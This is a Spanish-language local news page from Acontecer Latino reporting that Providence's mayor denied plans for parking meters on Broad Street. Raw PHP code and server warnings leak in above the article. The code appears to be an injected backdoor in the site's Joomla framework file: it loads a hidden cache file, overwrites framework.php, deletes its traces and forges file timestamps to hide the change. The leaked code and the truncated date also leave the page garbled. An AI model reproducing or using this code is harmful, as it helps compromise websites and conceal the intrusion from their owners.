$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Niegan instalación de parquímetros en la Broad Street

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Niegan instalación de parquímetros en la Broad Street

Imprimir PDF

parquimetro

PROVIDENCE, RI.- Los fuertes rumores que daban cuenta de la instalación de parquímetros para cobrar por el estacionamiento en la Broad Street de Providence, fueron desmentidos públicamente por el alcalde de esta ciudad, Jorge Elorza, durante una reunión el pasado martes, en la iglesia Visión Evangélica.

El encuentro fue propiciado por la directiva de la Asociación de Comerciantes Latinos de Providence, a raíz de la imperante preocupación que habrían manifestado los dueños de negocios de la referida arteria comercial y los moradores de vecindarios en las inmediaciones, sobre este particular.

La convocatoria, encabezada por Pedro Espinal, presidente de la asociación, contó con la participación del reverendo Israel Mercedes, una significativa representación de líderes comunitarios, comerciantes y residentes de la ciudad.

En conversación telefónica, la activista comunitaria Laura Rodríguez manifestó a ACONTECER LATINO que “había fuertes rumores de que se iban a instalar parquímetros en la Broad Street, y los comerciantes estaban muy preocupados”.

Refirió que esto motivó a que la Asociación de Comerciantes de Providence convocara una reunión urgente con el alcalde Elorza, donde los dueños de negocios le explicaran personalmente sus inquietudes en relación con esta medida y los proyectos que se implementarán próximamente en la Broad Street.

Rodríguez dijo que el alcalde de Providence se comprometió a que no se instalarán parquímetros en la Broad. “Tenemos que luchar para que eso nunca suceda porque después que los instalen será muy difícil que los remuevan, como ha sucedido en Federal Hill”, puntualizó.

En relación con los parquímetros en Federal Hill, que fueron instalados el año pasado, la FHCA (Federal Hill Commerce Association) anunció que someterá una petición escrita, conteniendo las firmas de sus miembros, clientes, residentes de la ciudad y empleados para obligar al alcalde Jorge Elorza a remover los parquímetros del área de negocios de la Atwells.

Respuesta oficial

En una breve declaración enviada a la redacción de Acontecer Latino, el secretario de Prensa de la Ciudad de Providence, Víctor Morente, confirmó que el alcalde Elorza se reunió con representantes de la Asociación de Negocios Latinos de Providence el martes 13 de junio de 20, en una reunión comunitaria en la Iglesia Visión Evangélica, donde surgió el tema de la potencial instalación de parquímetros en la Broad Street.

“El alcalde le dijo a los dueños de negocios que no había nada de cierto en eso. Nosotros no sabemos dónde se originó esta desinformación, pero no hay planes para esto”, concluye el mensaje. (Foto Octavio Gómez)